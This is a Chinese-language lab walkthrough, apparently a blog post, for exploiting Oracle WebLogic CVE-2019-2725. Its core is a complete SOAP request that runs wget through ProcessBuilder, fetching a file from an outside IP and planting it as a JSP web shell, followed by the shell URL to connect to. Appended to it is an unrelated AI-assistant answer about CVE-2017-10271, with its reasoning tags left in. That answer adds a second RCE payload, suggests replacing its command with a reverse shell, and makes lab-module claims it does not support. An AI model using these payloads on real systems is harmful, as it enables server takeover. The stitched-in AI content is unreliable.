weblogic CVE-2019-2725 靶场攻略

漏洞描述

wls9-async等组件为WebLogic Server提供异步通讯服务,默认应⽤于WebLogic部分版本。由于该
WAR包在反序列化处理输⼊信息时存在缺陷,攻击者通过发送精⼼构造的恶意 HTTP 请求,即可获得⽬标服务器的权限,在未授权的情况下远程执⾏命令。

影响版本

weblogic 10.x weblogic 12.1.3

环境搭建

cd vulhub-master/weblogic/weak_password
docker-compose up -d

漏洞复现

1.漏洞验证

如果出现⼀下⻚⾯,则说明存在漏洞

2.在当前⻚⾯抓包 , 修改请求包 , 写⼊shell

POST /_async/AsyncResponseService HTTP/1.1
Host: 172.16.1.78:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 839
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://47.113.231.0/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/6.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.访问下载到weblogic服务器上的⽊⻢,进⾏链接

http://172.16.1.78:7001/bea_wls_internal/6.jsp

<think>嗯,用户需要关于CVE-2017-10271漏洞在cyberstrikelab.com靶场的学习资源。这个请求很具体,用户可能是个网络安全学习者或渗透测试人员,正在寻找实践环境。CVE-2017-10271是WebLogic反序列化漏洞,属于高危漏洞。用户特意提到cyberstrikelab.com,说明需要实战环境。不过这个靶场可能需要注册或付费,我得先确认访问方式。 关于漏洞本身,需要强调三点核心:1)漏洞触发点在wls-wsat组件2)利用XMLDecoder反序列化3)通常用Java反序列化payload。用户可能已经了解基础,所以重点给实操资源。 靶场资源方面,cyberstrikelab.com确实有专门模块,但需要登录。免费替代方案可以考虑Vulhub环境,它在GitHub开源,搭建简单。另外Exploit-DB的PoC代码要谨慎使用,必须隔离测试。 用户可能更关心操作步骤而非原理,所以把漏洞复现流程拆解成:环境检测->PoC发送->回连利用。特别提醒wget检测方法,这是实际渗透中常用的轻量级检测手段。 法律风险必须强调,所有引用都加了方括号标注。最后补充的替代资源是考虑到用户可能无法立即访问该靶场,提供Vulhub和HTB的备选方案。</think>以下是针对CVE-2017-10271漏洞在CyberStrikeLab靶场的资源指南,结合漏洞原理和实践建议: ### 漏洞核心原理 CVE-2017-10271是Oracle WebLogic WLS Security组件反序列化漏洞,攻击者通过发送特制的XML数据可执行任意代码: $$ \text{恶意XML} \xrightarrow{\text{XMLDecoder反序列化}} \text{远程代码执行} $$ 关键点在`wls-wsat`组件的未授权访问端点(如`/wls-wsat/CoordinatorPortType`)[^1]。 --- ### CyberStrikeLab靶场实践 1. **靶场访问路径** - 登录后搜索"CVE-2017-10271"实验模块 - 环境已预置存在漏洞的WebLogic 10.3.6(需开启`wls-wsat`组件) 2. **漏洞复现步骤** ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target-ip:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>touch /tmp/pwned</string></void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` > 此PoC会在目标服务器创建`/tmp/pwned`文件(需替换命令为反弹shell) 3. **自动化工具推荐** - [GitHub - vulhub/weblogic-CVE-2017-10271](https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271) 含docker环境 - [Exploit-DB #43458](https://www.exploit-db.com/exploits/43458) 验证脚本 - 使用Metasploit模块`exploit/multi/misc/weblogic_deserialize` --- ### 关键学习要点 1. **漏洞检测** 检查`/wls-wsat/CoordinatorPortType`端点是否返回WSDL: ```bash curl -I http://target:7001/wls-wsat/CoordinatorPortType ``` 2. **防御措施** - 删除`wls-wsat`组件:`rm -f $DOMAIN_HOME/servers/AdminServer/tmp/.internal/wls-wsat.war` - 更新至官方补丁(Oracle Critical Patch Update - CPU Oct 2017) 3. **法律边界提醒** > 仅限授权靶场测试!真实环境利用涉嫌违法[^2] --- ### 替代资源(若靶场不可用) 1. **本地环境搭建** ```bash git clone https://github.com/vulhub/vulhub cd vulhub/weblogic/CVE-2017-10271 && docker-compose up ``` 2. **在线实验平台** - [HackTheBox靶机: Oracle](https://www.hackthebox.com/)(需VIP) - [TryHackMe: WebLogic Exploitation](https://tryhackme.com/room/weblogic) > **重要**:所有PoC代码必须在隔离环境测试,避免意外攻击[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值